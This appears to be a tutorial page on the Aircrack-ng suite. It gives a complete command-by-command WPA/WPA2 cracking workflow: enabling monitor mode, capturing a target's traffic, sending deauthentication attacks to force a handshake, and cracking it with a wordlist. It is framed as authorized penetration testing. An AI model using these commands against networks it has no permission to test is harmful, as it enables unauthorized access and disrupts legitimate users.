Aircrack-ng WiFi Password Cracker

What is Aircrack-ng?

Aircrack-ng is the industry-standard open-source suite for 802.11 wireless network security auditing. It is not a single tool but a collection of specialized utilities that together cover the full wireless attack workflow: putting an adapter into monitor mode, capturing packets, performing deauthentication attacks to force handshake capture, injecting crafted packets, and cracking WEP keys or WPA/WPA2 handshakes offline via dictionary or brute-force attacks. It is the foundational toolkit that most other wireless frameworks — including Wifite and Airgeddon — are built on top of.

⚠ Legal Notice

Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.

Installation

# Update packages
sudo apt update

# Install Aircrack-ng suite (pre-installed on Kali)
sudo apt install aircrack-ng -y

# Verify all tools are available
aircrack-ng --version
airodump-ng --version
aireplay-ng --version

Suite Components

airmon-ng — Enable/disable monitor mode on a wireless interface
airodump-ng — Capture raw 802.11 frames; scan for APs and clients
aireplay-ng — Inject packets; perform deauth, ARP replay, and fake auth attacks
aircrack-ng — Crack WEP keys or WPA/WPA2 handshakes from a capture file
airbase-ng — Create a fake access point (software AP / Evil Twin)
airdecap-ng — Decrypt WEP/WPA capture files given a known key
packetforge-ng — Forge arbitrary 802.11 packets for injection

WPA/WPA2 Attack Workflow

# Step 1: Kill interfering processes and enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface is now wlan0mon

# Step 2: Scan for nearby networks
sudo airodump-ng wlan0mon

# Step 3: Lock onto target AP and capture traffic
# Replace BSSID and channel with target values
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Step 4: Deauth a connected client to force WPA handshake
# (run in a second terminal while capture is running)
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Look for "WPA handshake:" in airodump-ng output

# Step 5: Crack the handshake offline with a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

Common Use Cases

Authorized wireless penetration testing of WEP/WPA/WPA2 networks
CTF (Capture The Flag) challenges involving wireless captures
Testing the strength of a Wi-Fi password against dictionary attacks
Foundation for automated wireless tools like Wifite and Airgeddon

Tips & Best Practices

Always run airmon-ng check kill before starting monitor mode — background processes like NetworkManager will interfere with packet capture. After your assessment, restore managed mode with airmon-ng stop wlan0mon and restart networking with service NetworkManager start. For faster cracking, convert the handshake to hashcat format (hccapx) with aircrack-ng -j and use GPU acceleration via hashcat -m 2500.

Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs before using in live engagements.